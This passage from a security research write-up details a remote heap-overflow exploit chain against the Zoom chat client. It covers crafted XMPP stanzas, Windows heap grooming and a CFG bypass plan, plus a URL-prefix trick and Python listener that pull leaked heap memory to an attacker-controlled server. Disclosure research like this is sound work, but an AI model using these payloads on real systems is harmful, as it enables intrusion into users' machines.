  2. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <thread>gloox{25F7E533-7434-49E3-B3AC-2F702579C347}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <zmext>
    <msg_type>207</msg_type>
    <from n="Jane Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</scid>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="RequestKey">
      <xkey>
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTA0MDIxMjAzNDVaFw0yMjA0MDIxMjMzNDVaMEoxLDAqBgNVBAMMI2VrM19mZHZ5dHFnbTB6emxtY25kZ2FAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAa5LZ0vdjfjTDbPnuK2Pj1WKRaBee0QoAUQ281Z+uG4Ui58+QBSfWVVWCrG/8R4KTPvhS7/utzNIe+5R8oE69EPFAFNBMe/nCugYfi/EzEtwzor/x1R6sE10rIBGwFwKNSnzxtwDbiFmjpWFFV7TAdT/wr/f1E1ZkVR4ooitgVwGfREVMA0GCSqGSIb3DQEBCwUAA4IBAQAbtx2A+A956elf/eGtF53iQv2PT9I/4SNMIcX5Oe/sJrH1czcTfpMIACpfbc9Iu6n/WNCJK/tmvOmdnFDk2ekDt9jeVmDhwJj2pG+cOdY/0A+5s2E5sFTlBjDmrTB85U4xw8ahiH9FQTvj0J4FJCAPsqn0v6D87auA8K6w13BisZfDH2pQfuviJSfJUOnIPAY5+/uulaUlee2HQ1CZAhFzbBjF9R2LY7oVmfLgn/qbxJ6eFAauhkjn1PMlXEuVHAap1YRD8Y/xZRkyDFGoc9qZQEVj6HygMRklY9xUnaYWgrb9ZlCUaRefLVT3/6J21g6G6eDRtWvE1nMfmyOvTtjC</pub_cert>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <v2data action="None"/>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
</message>
  3. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <thread>gloox{24A77779-3F77-414B-8BC7-E162C1F3BDDF}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <recv>[email protected]</recv>
      <rres>ZoomChat_pc</rres>
      <rcid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</rcid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTAyMTgxOTIzMjJaFw0yMjAyMTgxOTUzMjJaMEoxLDAqBgNVBAMMI2V3Y2psbmlfcndjamF5Z210cHZuZXdAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAPyPYr49WDKcwh2dc1V1GMv5whVyLaC0G/CzsvJXtSoSRouPaRBloBBlay2JpbYiZIrEBek3ONSzRd2Co1WouqXpASo2ADI/+qz3OJiOy/e4ccNzGtCDZTJHWuNVCjlV3abKX8smSDZyXc6eGP72p/xE96h80TLWpqoZHl1Ov+JiSVN/MA0GCSqGSIb3DQEBCwUAA4IBAQCUu+e8Bp9Qg/L2Kd/+AzYkmWeLw60QNVOw27rBLytiH6Ff/OmhZwwLoUbj0j3JATk/FiBpqyN6rMzL/TllWf+6oWT0ZqgdtDkYvjHWI6snTDdN60qHl77dle0Ah+VYS3VehqtqnEhy3oLiP3pGgFUcxloM85BhNGd0YMJkro+mkjvrmRGDu0cAovKrSXtqdXoQdZN1JdvSXfS2Otw/C2x+5oRB5/03aDS8Dw+A5zhCdFZlH4WKzmuWorHoHVMS1AVtfZoF0zHfxp8jpt5igdw/rFZzDxtPnivBqTKgCMSaWE5HJn9JhupHisoJUipGD8mvkxsWqYUUEI2GDauGw893</pub_cert>
        <encoded>...</encoded>
        <signature>MIGHAkIBaq/VH7MvCMnMcY+Eh6W4CN7NozmcXrRSkJJymvec+E5yWqF340QDNY1AjYJ3oc34ljLoxy7JeVjop2s9k1ZPR7cCQWnXQAViihYJyboXmPYTi0jRmmpBn61OkzD6PlAqAq1fyc8e6+e1bPsu9lwF4GkgI40NrPG/kbUx4RbiTp+Ckyo0</signature>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
</message>

The way the key is encrypted depends on the type of key used by the recipient's certificate. If it uses an RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but an elliptic curve key using the curve P-521. Algorithms for directly encrypting data with elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Hellman is performed using both users' keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.
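
As a hedged sketch of that ECDH step using the standard OpenSSL derive API; the key/IV split sizes here are our assumption, not Zoom's exact scheme:

#include <openssl/evp.h>
#include <string.h>

int derive_key_iv(EVP_PKEY *own_priv, EVP_PKEY *peer_pub,
                  unsigned char *key /* 32 bytes */, unsigned char *iv /* 16 bytes */) {
    unsigned char secret[66];          /* a P-521 shared secret is up to 66 bytes */
    size_t secret_len = sizeof(secret);

    EVP_PKEY_CTX *ctx = EVP_PKEY_CTX_new(own_priv, NULL);
    if (!ctx || EVP_PKEY_derive_init(ctx) <= 0 ||
        EVP_PKEY_derive_set_peer(ctx, peer_pub) <= 0 ||
        EVP_PKEY_derive(ctx, secret, &secret_len) <= 0) {
        EVP_PKEY_CTX_free(ctx);
        return 0;
    }
    EVP_PKEY_CTX_free(ctx);

    /* Split the shared secret into an AES-256 key and an IV (assumed layout). */
    memcpy(key, secret, 32);
    memcpy(iv, secret + 32, 16);
    return 1;
}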

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;
  }

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);

      return 1;
    }

    return 1;
  }

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;
  }

  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
        logging::LogMessage::LogMessage
                  (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}

Side note: we don't know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate it requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction, by sending a few chat messages to a user who had previously accepted an external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then overflowed while handling the same packet. We can not place the buffer first, allocate something else and only then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few such objects during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don't include Zoom, so the NT Heap is what is used here. The NT Heap has two different allocators (for allocations of less than about 16 kB): the front-end allocator (known as the Low Fragmentation Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.
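
A toy model of that behaviour, for illustration only; the real implementation lives in ntdll and is considerably more involved:

#include <stdio.h>
#include <stdlib.h>

/* Toy size-sorted freelist: first fit, split the block, reinsert the rest. */
typedef struct Node {
    size_t addr, size;
    struct Node *next;
} Node;

static void insert_sorted(Node **list, Node *n) {
    while (*list && (*list)->size < n->size) list = &(*list)->next;
    n->next = *list;
    *list = n;
}

static size_t backend_alloc(Node **list, size_t want) {
    for (Node **pp = list; *pp; pp = &(*pp)->next) {
        Node *b = *pp;
        if (b->size < want) continue;      /* walk until a big-enough block */
        *pp = b->next;                     /* unlink it */
        size_t addr = b->addr;
        if (b->size > want) {              /* split: remainder goes back in */
            b->addr += want;
            b->size -= want;
            insert_sorted(list, b);
        } else {
            free(b);
        }
        return addr;                       /* deterministic result */
    }
    return 0;                              /* would extend the heap instead */
}

int main(void) {
    Node *freelist = NULL;
    size_t sizes[] = { 512, 1100, 4096 };
    for (int i = 0; i < 3; i++) {
        Node *n = malloc(sizeof *n);
        n->addr = 0x10000u * (i + 1);
        n->size = sizes[i];
        insert_sorted(&freelist, n);
    }
    /* A 1040-byte request skips the 512-byte block, takes the 1100-byte one
     * and reinserts the 60-byte remainder. */
    printf("allocated at 0x%zx\n", backend_alloc(&freelist, 1040));
    return 0;
}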

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow this procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrarily sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrarily large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a block of a specific size, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least one of them would already be handled by the LFH, completely breaking our exploit. We weren't very keen on participating with an exploit that had already failed 75% of the time by the time the application had finished launching. We spent a few weeks trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, let's look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLL’s did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.
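
Conceptually, the inserted check behaves something like this toy sketch; the real check is a bitmap lookup in ntdll rather than a list, and non-CFG DLL ranges are treated as always valid:

#include <stdio.h>
#include <stdlib.h>

typedef void (*fnptr)(void);

static void safe_target(void) { puts("valid call target"); }

/* Stand-in for the CFG bitmap of valid function start addresses. */
static int is_valid_call_target(fnptr p) {
    static const fnptr valid_targets[] = { safe_target };
    for (size_t i = 0; i < sizeof valid_targets / sizeof *valid_targets; i++)
        if (valid_targets[i] == p) return 1;
    return 0;
}

/* Roughly what guard_check_icall does before an indirect call. */
static void guarded_indirect_call(fnptr p) {
    if (!is_valid_call_target(p))
        abort();          /* CFG raises a fast-fail exception here */
    p();
}

int main(void) {
    guarded_indirect_call(safe_target);   /* allowed */
    return 0;
}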

Not enabling CFG for a dll means two things:

  • Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG and which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLL’s to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then free all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks to see if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. A common way would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 bytes containing a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:

"https://marketplacecontent.zoom.us" + image
"https://marketplacecontent.zoom.us" + "example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
"https://marketplacecontent.zoom.usexample.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.
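
To make the concatenation concrete, here is a minimal sketch in Python (standard library only; the values are those from the stanza above, with the path abbreviated for readability):

from urllib.parse import urlsplit

prefix = "https://marketplacecontent.zoom.us"
# Attacker-chosen pic_relative_url (path abbreviated)
relative = "example.org//CSKvJMq_RlSOESfMvUk-dw/app/iGpmOSiuQr6qEYgWh15UKA.png"

url = prefix + relative
print(url)                     # https://marketplacecontent.zoom.usexample.org//...
print(urlsplit(url).hostname)  # marketplacecontent.zoom.usexample.org
# The registrable domain of that host is no longer zoom.us, so by picking the
# appended string, the request can be steered to a host the attacker controls.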

We are still not fully sure why this works, but it worked. This is one of the two additional low-impact bugs we used for our attack, and it has also been fixed according to the Zoom Security Bulletin. On its own, this bug could be used to obtain the external IP address of another user if they are signed in to Zoom, even if you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but goes through the server, which means that invalid XML would not reach us. As the addresses we wanted to leak were unlikely to consist entirely of printable characters, we could not get them included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate an HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this is similar to creating an object, overwriting a length field and reading it back. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.
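
As a rough sketch, the attacker-side listener for steps 2, 4 and 5 of the plan could look like the following (assuming Python's standard ssl module, a certificate for the domain the victim is redirected to, and a fixed delay standing in for the real synchronization with the overflow):

import socket, ssl, time

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("server.crt", "server.key")  # hypothetical cert/key files

srv = socket.socket()
srv.bind(("0.0.0.0", 443))
srv.listen(1)

raw, _ = srv.accept()   # step 2: accept the TCP connection...
time.sleep(30)          # ...but stall; meanwhile the overflow rewrites the
                        # query buffer and its zero-terminator on the victim's heap

tls = ctx.wrap_socket(raw, server_side=True)  # step 4: let the TLS handshake proceed

request = tls.recv(8192)  # step 5: the request now contains the query plus whatever
print(request)            # followed the overwritten terminator, up to the next null byte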

This allowed us to leak data from the start of the next block up to the first null byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL (libcrypto-1_1.dll, to be specific). TLS1_PRF_PKEY_CTX is an object used during a TLS handshake to compute and verify a MAC of the handshake transcript, to make sure an active attacker has not changed anything along the way. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
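    /* Note: kctx->md, the pointer at the very start of the struct, is not
       cleared, so the freed block still begins with a pointer into
       libcrypto-1_1.dll. */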
    OPENSSL_free(kctx);
}

